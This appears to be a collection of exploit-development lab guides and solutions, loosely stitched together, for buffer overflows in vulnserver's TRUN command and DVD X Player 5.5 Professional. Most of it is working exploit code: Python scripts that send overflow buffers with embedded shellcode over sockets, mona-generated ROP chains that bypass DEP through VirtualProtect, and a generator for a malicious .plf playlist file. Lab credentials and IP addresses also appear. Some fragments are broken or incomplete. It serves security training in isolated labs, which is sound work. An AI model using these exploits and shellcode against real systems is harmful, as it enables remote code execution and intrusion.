Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
Task 1: Recognize the exploitable conditions
We will start by launching the exploit skeleton. We
will see that the EIP is already overwritten. Our
intention is to turn this EIP-overwrite crash into
code execution. Let's start with the following draft
exploit.
#!/usr/bin/python
egghunter =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\
x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe
7\xff\xe7"
sc =
("\xbf\x9a\xfc\xd9\xc5\xdb\xd3\xd9\x74\x24\xf4\x5b\x29
\xc9\xb1"
"\x31\x83\xeb\xfc\x31\x7b\x0f\x03\x7b\x95\x1e\x2c\x39\
x41\x5c"
"\xcf\xc2\x91\x01\x59\x27\xa0\x01\x3d\x23\x92\xb1\x35\
x61\x1e"
"\x39\x1b\x92\x95\x4f\xb4\x95\x1e\xe5\xe2\x98\x9f\x56\
xd6\xbb"
"\x23\xa5\x0b\x1c\x1a\x66\x5e\x5d\x5b\x9b\x93\x0f\x34\
xd7\x06"
"\xa0\x31\xad\x9a\x4b\x09\x23\x9b\xa8\xd9\x42\x8a\x7e\
x52\x1d"
"\x0c\x80\xb7\x15\x05\x9a\xd4\x10\xdf\x11\x2e\xee\xde\
xf3\x7f"
"\x0f\x4c\x3a\xb0\xe2\x8c\x7a\x76\x1d\xfb\x72\x85\xa0\
xfc\x40"
"\xf4\x7e\x88\x52\x5e\xf4\x2a\xbf\x5f\xd9\xad\x34\x53\
x96\xba"
"\x13\x77\x29\x6e\x28\x83\xa2\x91\xff\x02\xf0\xb5\xdb\
x4f\xa2"
"\xd4\x7a\x35\x05\xe8\x9d\x96\xfa\x4c\xd5\x3a\xee\xfc\
xb4\x50"
"\xf1\x73\xc3\x16\xf1\x8b\xcc\x06\x9a\xba\x47\xc9\xdd\
x42\x82"
"\xae\x12\x09\x8f\x86\xba\xd4\x45\x9b\xa6\xe6\xb3\xdf\
xde\x64"
"\x36\x9f\x24\x74\x33\x9a\x61\x32\xaf\xd6\xfa\xd7\xcf\
x45\xfa"
"\xfd\xb3\x08\x68\x9d\x1d\xaf\x08\x04\x62")
shellcode = "w00tw00t" + sc
buffer = (
"HEAD /" + payload1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: " + "Exploit Writer" + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()
Scenario
Your red team manager keeps challenging you, to
further develop your exploit development skills. This
time he tasked you with automating payload generation
and crash identification. A Windows 7 machine has been
set up for you. Vulnserver is in this machine's
Desktop and it will be the target of fuzzing
activities. Your challenge is to identify if there is
a vulnerability in vulnserver's TRUN command, through
fuzzing.
Username: eLS
Password: eLSPwdAdmin1602
In this lab's context, we chose to run vulnserver on
port 9999 (vulnserver.exe 9999)
Goals
● Automate payload generation and vulnerability
identification
Recommended tools
● Immunity Debugger
● Mona.py
● Spike
● Wireshark
● Kali linux
Network Configuration &
Credentials
● Penetration tester's Subnet: 172.16.172.0/24
Username: eLS
Password: eLSPwdAdmin1602
Spike Fundamentals
According to OWASP, Fuzz testing or Fuzzing is a Black
Box software testing technique, which basically
consists in finding implementation bugs using
malformed/semi-malformed data injection in an
automated fashion. Fuzzing, when performed by exploit
developers/security researchers etc., focuses on
discovering bugs that could lead to code execution.
There are numerous fuzzers available, but in the
context of this course we will focus on SPIKE.
SPIKE Scripting
Strings
Binary Data
Defining Blocks
Block Sizes
● s_binary_block_size_byte("block1"); //adds a 1
byte value to the SPIKE that represents the size
of block "block1"
These are just two examples from the many ways of how
block size can be added to a SPIKE. There are other
methods too, that can allow you to represent block
size in a large variety of formats, and some that even
allow you to add preset values to the block size
before it is
Tasks
Task 1: Interact with the remote vulnserver
First, log in to the remote machine (172.16.172.156)
and start vulnserver (vulnserver.exe 9999)
SOLUTIONS
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
s_readline();
s_string("TRUN ");
s_string_variable("COMMAND");
#!/usr/bin/python
import socket
server = '172.16.172.156'
sport = 9999
Scenario
You have been tasked by your red team manager, to
refresh your Windows shellcoding skills. Specifically,
he provided you with a machine (172.16.172.51) that
contains everything needed to develop Windows
shellcode. Your task is to write a shellcode that will
display the following window upon execution and then
exit gracefully without causing memory corruption. You
are allowed to hardcode addresses.
Goals
● Create a shellcode that will create a window that
looks like the above
Recommended tools
● arwin
● dev-c++
● immunity debugger
● nasm
● text editor
● bin2sc utility
Username: elsadmin
Password: elsadmin1
Tasks
Task 1: Investigate the MessageBoxA Function
Using MSDN, figure out how to call the MessageBoxA
function. You might need to update the
shellcode-tester.c application so that it includes the
proper DLL library. The LoadLibrary function might be
helpful.
Task 2: Develop your shellcode
Develop shellcode that will produce the window
presented above. Be reminded, that you can hardcode
addresses.
SOLUTIONS
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
int MessageBoxA(
HWND hWnd,
LPCSTR lpText,
LPCSTR lpCaption,
UINT uType
);
MessageBoxA is exported by user32.dll which is not
loaded into the shellcode tester application by
default. You need to modify its source code and add a
call to LoadLibrary("user32.dll"), as follows.
BITS 32
Scenario
Your red team manager keeps challenging you, to
further develop your exploit development skills. He
has setup a Windows 7 machine with DEP enabled.
Vulnserver is in this machine's Desktop. Your
challenge is to exploit vulnserver's TRUN command,
bypassing DEP.
● Username: eLS
● Password: eLSPwdAdmin1602
In this lab's context, we chose to run vulnserver on
port 9999 (vulnserver.exe 9999)
Goals
● Discover vulnerabilities in the executable's TRUN
command
● Utilize ROP
● Bypassing DEP
Recommended tools
● Immunity Debugger
● Mona.py
● Kali linux
Network Configuration &
Credentials
● Penetration tester's Subnet: 172.16.172.0/24
Username: eLS
Password: eLSPwdAdmin1602
Tasks
Task 1: Launch the vulnserver exploit you
created on Lab 17: Fuzzing Windows Software
Launch the exploit you created on Lab 17: Fuzzing
Windows Software against vulnserver (TRUN command)
with Immunity attached. Does it work? Why is that?
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
#!/usr/bin/python
import socket
server = '172.16.172.154'
sport = 9999
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit = >
("\xda\xc8\xbf\x84\xb4\x10\xb8\xd9\x74\x24\xf4\x5d\x33
\xc9\xb1"
"\x31\x31\x7d\x18\x03\x7d\x18\x83\xc5\x80\x56\xe5\x44\
x60\x14"
"\x06\xb5\x70\x79\x8e\x50\x41\xb9\xf4\x11\xf1\x09\x7e\
x77\xfd"
"\xe2\xd2\x6c\x76\x86\xfa\x83\x3f\x2d\xdd\xaa\xc0\x1e\
x1d\xac"
"\x42\x5d\x72\x0e\x7b\xae\x87\x4f\xbc\xd3\x6a\x1d\x15\
x9f\xd9"
"\xb2\x12\xd5\xe1\x39\x68\xfb\x61\xdd\x38\xfa\x40\x70\
x33\xa5"
"\x42\x72\x90\xdd\xca\x6c\xf5\xd8\x85\x07\xcd\x97\x17\
xce\x1c"
"\x57\xbb\x2f\x91\xaa\xc5\x68\x15\x55\xb0\x80\x66\xe8\
xc3\x56"
"\x15\x36\x41\x4d\xbd\xbd\xf1\xa9\x3c\x11\x67\x39\x32\
xde\xe3"
"\x65\x56\xe1\x20\x1e\x62\x6a\xc7\xf1\xe3\x28\xec\xd5\
xa8\xeb"
"\x8d\x4c\x14\x5d\xb1\x8f\xf7\x02\x17\xdb\x15\x56\x2a\
x86\x73"
"\xa9\xb8\xbc\x31\xa9\xc2\xbe\x65\xc2\xf3\x35\xea\x95\
x0b\x9c"
"\x4f\x69\x46\xbd\xf9\xe2\x0f\x57\xb8\x6e\xb0\x8d\xfe\
x96\x33"
"\x24\x7e\x6d\x2b\x4d\x7b\x29\xeb\xbd\xf1\x22\x9e\xc1\
xa6\x43"
"\x8b\xa1\x29\xd0\x57\x08\xcc\x50\xfd\x54")
padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
attack = prefix + eip + nopsled + exploit + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ",
len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
#!/usr/bin/python
import socket
server = '172.16.172.154'
sport = 9999
def create_rop_chain():
# rop chain generated with mona.py -
www.corelan.be
rop_gadgets = [
0x754dfe56, # POP ECX # RETN [msvcrt.dll] **
REBASED ** ASLR
0x6250609c, # ptr to &VirtualProtect() [IAT
essfunc.dll]
0x750ffd52, # MOV ESI,DWORD PTR DS:[ECX] # ADD
DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR
0x754cf45a, # POP EBP # RETN [msvcrt.dll] **
REBASED ** ASLR
0x625011bb, # & jmp esp [essfunc.dll]
0x625011f0, # POP EAX # RETN [essfunc.dll]
0xfffffdff, # Value to negate, will become
0x00000201
0x756737ba, # NEG EAX # RETN [RPCRT4.dll] **
REBASED ** ASLR
0x750ff9f1, # XCHG EAX,EBX # RETN [MSCTF.dll] **
REBASED ** ASLR
0x754baeba, # POP EAX # RETN [msvcrt.dll] **
REBASED ** ASLR
0xffffffc0, # Value to negate, will become
0x00000040
0x756dad46, # NEG EAX # RETN [RPCRT4.dll] **
REBASED ** ASLR
0x756cf8bc, # XCHG EAX,EDX #RETN [RPCRT4.dll] **
REBASED ** ASLR
0x754c40d0, # POP ECX # RETN [msvcrt.dll] **
REBASED ** ASLR
0x75700cc9, # &Writable location [RPCRT4.dll] **
REBASED ** ASLR
0x7738c47a, # POP EDI # RETN [ntdll.dll] **
REBASED ** ASLR
0x756a0b64, # RETN (ROP NOP) [RPCRT4.dll] **
REBASED ** ASLR
0x75513866, # POP EAX # RETN [msvcrt.dll] **
REBASED ** ASLR
0x90909090, # nop
0x773220e0, # PUSHAD # RETN [ntdll.dll] ** REBASED
** ASLR
]
return ''.join(struct.pack('<I', _) for _ in
rop_gadgets)
rop_chain = create_rop_chain()
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit =
("\xda\xc8\xbf\x84\xb4\x10\xb8\xd9\x74\x24\xf4\x5d\x33
\xc9\xb1"
"\x31\x31\x7d\x18\x03\x7d\x18\x83\xc5\x80\x56\xe5\x44\
x60\x14"
"\x06\xb5\x70\x79\x8e\x50\x41\xb9\xf4\x11\xf1\x09\x7e\
x77\xfd"
"\xe2\xd2\x6c\x76\x86\xfa\x83\x3f\x2d\xdd\xaa\xc0\x1e\
x1d\xac"
"\x42\x5d\x72\x0e\x7b\xae\x87\x4f\xbc\xd3\x6a\x1d\x15\
x9f\xd9"
"\xb2\x12\xd5\xe1\x39\x68\xfb\x61\xdd\x38\xfa\x40\x70\
x33\xa5"
"\x42\x72\x90\xdd\xca\x6c\xf5\xd8\x85\x07\xcd\x97\x17\
xce\x1c"
"\x57\xbb\x2f\x91\xaa\xc5\x68\x15\x55\xb0\x80\x66\xe8\
xc3\x56"
"\x15\x36\x41\x4d\xbd\xbd\xf1\xa9\x3c\x11\x67\x39\x32\
xde\xe3"
"\x65\x56\xe1\x20\x1e\x62\x6a\xc7\xf1\xe3\x28\xec\xd5\
xa8\xeb"
"\x8d\x4c\x14\x5d\xb1\x8f\xf7\x02\x17\xdb\x15\x56\x2a\
x86\x73"
"\xa9\xb8\xbc\x31\xa9\xc2\xbe\x65\xc2\xf3\x35\xea\x95\
x0b\x9c"
"\x4f\x69\x46\xbd\xf9\xe2\x0f\x57\xb8\x6e\xb0\x8d\xfe\
x96\x33"
"\x24\x7e\x6d\x2b\x4d\x7b\x29\xeb\xbd\xf1\x22\x9e\xc1\
xa6\x43"
"\x8b\xa1\x29\xd0\x57\x08\xcc\x50\xfd\x54")
padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
attack = prefix + eip + nopsled + exploit + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ",
len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
#!/usr/bin/python
import socket, struct, sys
server = '172.16.172.154'
sport = 9999
def create_rop_chain():
rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x754dfe56, # POP ECX # RETN [msvcrt.dll] **
REBASED ** ASLR
0x6250609c, # ptr to &VirtualProtect() [IAT
essfunc.dll]
0x750ffd52, # MOV ESI,DWORD PTR DS:[ECX] # ADD
DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR
0x754cf45a, # POP EBP # RETN [msvcrt.dll] **
REBASED ** ASLR
0x625011bb, # & jmp esp [essfunc.dll]
0x625011f0, # POP EAX # RETN [essfunc.dll]
0xfffffdff, # Value to negate, will become
0x00000201
0x756737ba, # NEG EAX # RETN [RPCRT4.dll] **
REBASED ** ASLR
0x750ff9f1, # XCHG EAX,EBX # RETN [MSCTF.dll] **
REBASED ** ASLR
0x754baeba, # POP EAX # RETN [msvcrt.dll] **
REBASED ** ASLR
0xffffffc0, # Value to negate, will become
0x00000040
0x756dad46, # NEG EAX # RETN [RPCRT4.dll] **
REBASED ** ASLR
0x756cf8bc, # XCHG EAX,EDX # RETN [RPCRT4.dll]
** REBASED ** ASLR
0x754c40d0, # POP ECX # RETN [msvcrt.dll] **
REBASED ** ASLR
0x75700cc9, # &Writable location [RPCRT4.dll] **
REBASED ** ASLR
0x7738c47a, # POP EDI # RETN [ntdll.dll] **
REBASED ** ASLR
0x756a0b64, # RETN (ROP NOP) [RPCRT4.dll] **
REBASED ** ASLR
0x75513866, # POP EAX # RETN [msvcrt.dll] **
REBASED ** ASLR
0x90909090, # nop
0x773220e0, # PUSHAD # RETN [ntdll.dll] **
REBASED ** ASLR
]
return ''.join(struct.pack('<I', _) for _ in
rop_gadgets)
rop_chain = create_rop_chain()
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit =
("\xda\xc8\xbf\x84\xb4\x10\xb8\xd9\x74\x24\xf4\x5d\x33
\xc9\xb1"
"\x31\x31\x7d\x18\x03\x7d\x18\x83\xc5\x80\x56\xe5\x44\
x60\x14"
"\x06\xb5\x70\x79\x8e\x50\x41\xb9\xf4\x11\xf1\x09\x7e\
x77\xfd"
"\xe2\xd2\x6c\x76\x86\xfa\x83\x3f\x2d\xdd\xaa\xc0\x1e\
x1d\xac"
"\x42\x5d\x72\x0e\x7b\xae\x87\x4f\xbc\xd3\x6a\x1d\x15\
x9f\xd9"
"\xb2\x12\xd5\xe1\x39\x68\xfb\x61\xdd\x38\xfa\x40\x70\
x33\xa5"
"\x42\x72\x90\xdd\xca\x6c\xf5\xd8\x85\x07\xcd\x97\x17\
xce\x1c"
"\x57\xbb\x2f\x91\xaa\xc5\x68\x15\x55\xb0\x80\x66\xe8\
xc3\x56"
"\x15\x36\x41\x4d\xbd\xbd\xf1\xa9\x3c\x11\x67\x39\x32\
xde\xe3"
"\x65\x56\xe1\x20\x1e\x62\x6a\xc7\xf1\xe3\x28\xec\xd5\
xa8\xeb"
"\x8d\x4c\x14\x5d\xb1\x8f\xf7\x02\x17\xdb\x15\x56\x2a\
x86\x73"
"\xa9\xb8\xbc\x31\xa9\xc2\xbe\x65\xc2\xf3\x35\xea\x95\
x0b\x9c"
"\x4f\x69\x46\xbd\xf9\xe2\x0f\x57\xb8\x6e\xb0\x8d\xfe\
x96\x33"
"\x24\x7e\x6d\x2b\x4d\x7b\x29\xeb\xbd\xf1\x22\x9e\xc1\
xa6\x43"
"\x8b\xa1\x29\xd0\x57\x08\xcc\x50\xfd\x54")
padding = 'F' * (3000 - 2006 - len(rop_chain) - 16 -
len(exploit))
attack = prefix + rop_chain + nopsled + exploit +
padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ",
len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
Scenario
Your red team manager keeps challenging you, to
further develop your exploit development skills. He
has setup a Windows 7 machine with DEP enabled. DVD X
Player 5.5 Professional is in this machine's Desktop.
Your challenge is to exploit DVD X Player 5.5
Professional, bypassing DEP.
You can connect to the lab machine via remote desktop.
The target IP is 172.16.172.155
● Username: eLS
● Password: eLSPwdAdmin1602
Goals
● Discover vulnerabilities in DVD X Player 5.5
Professional
● Utilize ROP
● Bypassing DEP
Recommended tools
● Immunity Debugger
● Mona.py
● Kali linux
Username: eLS
Password: eLSPwdAdmin1602
Tasks
Task 1: Install DVD X Player 5.5 Professional
and identify the exploitable conditions
The DVD X Player 5.5 Professional's installer can be
found on the Desktop. Install it and then try to
identify any vulnerabilities.
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
#!/usr/bin/env python
try:
f=open("LoadMe.plf","w")
print "[+] Creating %s bytes of payload.."
%len(buffer)
f.write(buffer)
f.close()
print "[+] File created. Load and Conquer"
except:
print "File cannot be created"
!mona pc 2000
!mona po 0x37694136
#!/usr/bin/env python
buffer = "\x41" * 260 # eip offset
buffer += "\x42" * 4
buffer += "\x43" * (1500-260-4)
try:
f=open("LoadMe.plf","w")
print "[+] Creating %s bytes of payload.."
%len(buffer)
f.write(buffer)
f.close()
print "[+] File created. Load and Conquer"
except:
print "File cannot be created"
Any bad characters should also be identified. For your
convenience, the bar chars are "\x00\x0a\x0d\x1a\x20"
!mona rop -m
VersionInfo.dll,NetReg.dll,SkinScrollBar.dll,MediaPlay
erCtrl.dll,Configuration.dll,EPG.dll -cpb
'\x00\x0a\x0d\x1a\x20'
#!/usr/bin/env python
import struct
import time
shellcode = ""
shellcode +=
"\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode +=
"\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode +=
"\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode +=
"\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode +=
"\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode +=
"\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode +=
"\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode +=
"\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode +=
"\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode +=
"\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode +=
"\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode +=
"\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode +=
"\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode +=
"\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode +=
"\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode +=
"\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode +=
"\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
#----------------------------------------#
# ROP Chain setup for VirtualProtect() #
#----------------------------------------#
# EAX = NOP (0x90909090) #
# ECX = lpOldProtect (ptr to W address) #
# EDX = NewProtect (0x40) #
# EBX = dwSize #
# ESP = lPAddress (automatic) #
# EBP = ReturnTo (ptr to jmp esp) #
# ESI = ptr to VirtualProtect() #
# EDI = ROP NOP (RETN) #
#----------------------------------------#
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*25)-40-len(shellcode))
try:
f=open("LoadMe.plf","w")
print "[+] Creating %s bytes of payload.."
%len(buffer)
time.sleep(1)
f.write(buffer)
f.close()
print "[+] File created. Load and Conquer"
except:
print "File cannot be created"